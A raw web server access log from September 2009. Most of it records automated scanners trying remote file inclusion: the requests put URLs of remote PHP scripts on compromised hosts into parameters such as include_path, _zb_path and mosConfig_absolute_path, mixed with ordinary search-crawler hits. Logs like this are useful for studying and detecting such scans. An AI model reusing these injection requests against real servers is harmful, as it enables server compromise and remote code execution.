125.141.196.8 - - [07/Sep/2009:04:41:51 -0500] "GET ///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:04:41:51 -0500] "GET /logs/access_log.1237075200///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:04:41:53 -0500] "GET /logs///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 200 204076 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:04:42:55 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:04:42:55 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:04:42:55 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:04:43:12 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.24.35.80 - - [07/Sep/2009:04:43:14 -0500] "GET /logs/access_log.1248134400/index.php?nic=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 319 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
81.24.35.80 - - [07/Sep/2009:04:43:14 -0500] "GET /index.php?nic=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
81.24.35.80 - - [07/Sep/2009:04:43:23 -0500] "GET /logs/index.php?nic=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
80.67.26.40 - - [07/Sep/2009:04:43:30 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:04:43:51 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:04:43:56 -0500] "GET /logs/access_log.1244764800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:04:43:56 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:04:44:11 -0500] "GET /logs/access_log.1247616000///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:04:44:11 -0500] "GET ///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:04:44:13 -0500] "GET /logs///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 200 204076 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:04:44:28 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:04:44:38 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:04:44:42 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:04:44:57 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:04:45:01 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.165.14 - - [07/Sep/2009:04:45:46 -0500] "GET /logs/access_log.1223164800 HTTP/1.0" 200 10597 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
125.141.196.8 - - [07/Sep/2009:04:46:10 -0500] "GET ///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:04:46:18 -0500] "GET /logs/access_log.1236211200///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:04:46:18 -0500] "GET /logs/access_log.1236038400///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
125.141.196.8 - - [07/Sep/2009:04:46:20 -0500] "GET /logs///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 200 204076 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:04:46:42 -0500] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:04:46:45 -0500] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:04:46:45 -0500] "GET /logs/access_log.1244764800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:04:47:26 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:04:47:31 -0500] "GET /logs/access_log.1241827200/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.165.119 - - [07/Sep/2009:04:50:16 -0500] "GET /logs/access_log.1190505600 HTTP/1.1" 200 6990 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
218.38.136.251 - - [07/Sep/2009:04:50:50 -0500] "GET /logs/access_log.1239753600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:04:50:50 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:04:50:50 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:04:50:50 -0500] "GET /logs/access_log.1242691200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.90.115.6 - - [07/Sep/2009:04:52:20 -0500] "GET /logs/access_log.1228608000%20%20///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
66.90.115.6 - - [07/Sep/2009:04:52:20 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
66.90.115.6 - - [07/Sep/2009:04:52:20 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 200 204076 "-""Mozilla/5.0"
65.55.106.107 - - [07/Sep/2009:04:56:32 -0500] "GET /logs/access_log.1198108800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.165.26 - - [07/Sep/2009:05:03:14 -0500] "GET /logs/access_log.1229299200 HTTP/1.1" 200 26829 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
82.146.119.209 - - [07/Sep/2009:05:04:13 -0500] "GET /logs/access_log.1246579200//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.165.98 - - [07/Sep/2009:05:06:28 -0500] "GET /logs/access_log.1215734400 HTTP/1.1" 200 1948 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
59.150.247.202 - - [07/Sep/2009:05:10:13 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:05:10:13 -0500] "GET /logs/access_log.1245715200////?_SERVER[DOCUMENT_ROOT]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:05:10:15 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 200 204077 "-""Mozilla/5.0"
61.63.4.74 - - [07/Sep/2009:05:12:03 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.63.4.74 - - [07/Sep/2009:05:12:03 -0500] "GET /logs/access_log.1248134400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 354 "-""Mozilla/5.0"
61.63.4.74 - - [07/Sep/2009:05:12:03 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 332 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:05:16:13 -0500] "GET /logs/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:05:16:13 -0500] "GET /administrator/http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.803"
65.55.165.25 - - [07/Sep/2009:05:17:30 -0500] "GET /logs/access_log.1185494400 HTTP/1.1" 200 4011 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729; MS-RTC LM 8)"
199.96.29.70 - - [07/Sep/2009:05:17:40 -0500] "GET //main.php?sayfa=http://indo.home.ro/idbit??? HTTP/1.1" 404 292 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
199.96.29.70 - - [07/Sep/2009:05:17:40 -0500] "GET /logs//main.php?sayfa=http://indo.home.ro/idbit??? HTTP/1.1" 404 297 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
65.55.106.156 - - [07/Sep/2009:05:18:33 -0500] "GET /logs/access_log.1159747200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.136.37.141 - - [07/Sep/2009:05:18:36 -0500] "GET /logs/administrator/http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:05:18:36 -0500] "GET /administrator/http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:05:18:51 -0500] "GET /logs/administrator/http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:05:18:51 -0500] "GET /administrator/http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
94.136.37.141 - - [07/Sep/2009:05:19:38 -0500] "GET /administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.136.37.141 - - [07/Sep/2009:05:19:38 -0500] "GET /logs/access_log.1246233600/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.136.37.141 - - [07/Sep/2009:05:19:38 -0500] "GET /logs/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.136.37.141 - - [07/Sep/2009:05:20:30 -0500] "GET /logs/access_log.1246233600/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
94.136.37.141 - - [07/Sep/2009:05:20:30 -0500] "GET /logs/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 359 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
94.136.37.141 - - [07/Sep/2009:05:20:30 -0500] "GET /administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.90.115.6 - - [07/Sep/2009:05:21:30 -0500] "GET /logs/access_log.1229299200///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:05:21:40 -0500] "GET /logs/access_log.1240358400/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
94.136.37.141 - - [07/Sep/2009:05:21:45 -0500] "GET /logs/access_log.1240358400/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 381 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.175.25.226 - - [07/Sep/2009:05:21:52 -0500] "GET /admin/config_settings.tpl.php?include_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:05:21:52 -0500] "GET /logs/admin/config_settings.tpl.php?include_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:05:21:52 -0500] "GET /logs/access_log.1244246400/admin/config_settings.tpl.php?include_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.175.25.226 - - [07/Sep/2009:05:21:55 -0500] "GET /logs/access_log.1243641600/admin/config_settings.tpl.php?include_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:05:22:58 -0500] "GET /logs/admin/config_settings.tpl.php?include_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:05:22:58 -0500] "GET /admin/config_settings.tpl.php?include_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:05:22:58 -0500] "GET /logs/access_log.1244764800/admin/config_settings.tpl.php?include_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.165.123 - - [07/Sep/2009:05:23:08 -0500] "GET /logs/access_log.1195862400 HTTP/1.1" 200 1290 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
82.146.119.209 - - [07/Sep/2009:05:23:35 -0500] "GET /logs/access_log.1244246400/admin/config_settings.tpl.php?include_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
82.146.119.209 - - [07/Sep/2009:05:23:35 -0500] "GET /logs/access_log.1243641600/admin/config_settings.tpl.php?include_path=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.165.62 - - [07/Sep/2009:05:23:42 -0500] "GET /logs/access_log.1197676800 HTTP/1.1" 200 4487 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30707)"
65.55.165.120 - - [07/Sep/2009:05:24:29 -0500] "GET /logs/access_log.1124150400 HTTP/1.1" 200 775 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
65.55.165.118 - - [07/Sep/2009:05:25:26 -0500] "GET /logs/access_log.1175558400 HTTP/1.1" 200 1439 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
199.96.29.70 - - [07/Sep/2009:05:25:27 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 324 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
199.96.29.70 - - [07/Sep/2009:05:25:27 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 319 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
74.50.85.104 - - [07/Sep/2009:05:26:56 -0500] "GET ////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:05:26:56 -0500] "GET /logs////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:05:26:57 -0500] "GET /logs////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:05:26:57 -0500] "GET ////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:05:27:03 -0500] "GET /logs/access_log.1228608000////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:05:27:03 -0500] "GET /logs/access_log.1228608000////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.165.68 - - [07/Sep/2009:05:30:30 -0500] "GET /logs/access_log.1226275200 HTTP/1.1" 200 177702 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30707)"
74.50.85.104 - - [07/Sep/2009:05:31:36 -0500] "GET ////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:05:31:36 -0500] "GET /logs////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:05:31:36 -0500] "GET /logs/access_log.1228608000%20%20////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.55.165.121 - - [07/Sep/2009:05:31:46 -0500] "GET /logs/access_log.1205798400 HTTP/1.1" 200 2322 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729; MS-RTC LM 8)"
74.50.85.104 - - [07/Sep/2009:05:31:50 -0500] "GET ////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:05:31:50 -0500] "GET /logs////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:05:31:50 -0500] "GET /logs/access_log.1228608000%20%20////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
65.55.165.111 - - [07/Sep/2009:05:32:13 -0500] "GET /logs/access_log.1219881600 HTTP/1.1" 200 2539 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648)"
65.38.188.164 - - [07/Sep/2009:05:35:20 -0500] "GET /logs/index0.php?show=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:05:35:20 -0500] "GET /logs/access_log.1248134400/index0.php?show=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:05:35:25 -0500] "GET /index0.php?show=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:05:35:25 -0500] "GET /logs/index0.php?show=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:05:35:25 -0500] "GET /logs/access_log.1248134400/index0.php?show=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.38.188.164 - - [07/Sep/2009:05:35:25 -0500] "GET /index0.php?show=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.78.116.209 - - [07/Sep/2009:05:37:06 -0500] "GET /solpot.html?body=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.78.116.209 - - [07/Sep/2009:05:37:06 -0500] "GET /logs/solpot.html?body=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.78.116.209 - - [07/Sep/2009:05:37:06 -0500] "GET /logs/access_log.1246579200/solpot.html?body=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.78.116.209 - - [07/Sep/2009:05:37:46 -0500] "GET /logs/access_log.1247875200/solpot.html?body=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:05:40:17 -0500] "GET /logs/access_log.1236038400////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.165.15 - - [07/Sep/2009:05:40:35 -0500] "GET /logs/access_log.1221264000 HTTP/1.0" 200 12873 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729; MS-RTC LM 8)"
74.50.85.104 - - [07/Sep/2009:05:40:54 -0500] "GET /logs/access_log.1236038400////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
65.55.208.123 - - [07/Sep/2009:05:41:33 -0500] "GET /logs/access_log.1201564800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [07/Sep/2009:05:41:33 -0500] "GET /logs/access_log.1192752000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [07/Sep/2009:05:41:34 -0500] "GET /logs/access_log.1168473600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.123 - - [07/Sep/2009:05:41:41 -0500] "GET /logs/access_log.1187481600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.165.78 - - [07/Sep/2009:05:41:49 -0500] "GET /logs/access_log.1234051200 HTTP/1.1" 200 112812 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.30729; .NET CLR 3.5.30729; MS-RTC LM 8)"
65.55.106.205 - - [07/Sep/2009:05:43:34 -0500] "GET /logs/access_log.1140480000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.174.78.83 - - [07/Sep/2009:05:44:47 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:05:44:47 -0500] "GET /logs/access_log.1247270400//bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:05:44:47 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:05:45:12 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:05:45:12 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:05:45:12 -0500] "GET /logs/access_log.1247270400//bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:05:45:18 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
